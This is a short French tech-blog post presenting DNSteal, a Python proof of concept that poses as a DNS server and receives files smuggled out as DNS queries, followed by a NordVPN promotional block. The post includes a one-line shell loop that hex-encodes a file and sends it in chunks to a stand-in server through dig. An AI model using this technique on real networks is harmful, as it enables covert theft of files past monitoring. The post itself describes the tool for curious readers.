Korben, roi d’internet, logo bébé avec des lunettes en mode thug life Korben, roi d’internet, logo bébé avec des lunettes en mode thug life

Korben Upgrade your mind

Transférer des fichiers en utilisant des requêtes DNS

Voici un proof of concept intéressant qui s’appelle DNSteal et qui permet de transférer des documents via le net, de manière très discrète en utilisant le protocole DNS. DNSteal est un script python qui fait office de faux serveur DNS et qui peut recevoir en entrée des fichiers.

Une fois en place, il suffit par exemple de lancer la commande suivante pour transférer l’image send.png au faux serveur DNS.

for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done

C’est plutôt rigolo non ?

dnssteal

DNSteal supporte aussi le transfert multi-fichiers et la compression de ceux-ci. Son développeur s’est fait plaisir 🙂

Si vous voulez plus d’infos, c’est sur Github que ça se passe.


NordVPN ! [Bon plan] -68%

-68% 3,3€/mois durant 2 ans

Protection en un clic, fonctionnalité Kill Switch, masquage de votre adresse IP, prise en charge des partages de fichiers en p2p, protection contre les malwares et les pubs, streaming sans interruption, test de fuite DNS et même possibilité de coupler l’outil avec l’anonymat de The Onion Router … sont quelques-unes des autres options disponibles.

À noter que cet été l’outil a passé avec succès l’audit d’une société indépendante (PricewaterhouseCoopers) concernant leur politique de non-conservation de registre d’activité, validant que NordVPN ne conservait pas l’activité de ses utilisateurs sur le web.

De plus une licence NordVPN vous permet de protéger jusqu’à 6 appareils et cela, quelle que soit la plateforme sur laquelle ces derniers tournent (android où iOS, Windows, Linux ou macOS, android TV).

Profiter de la promo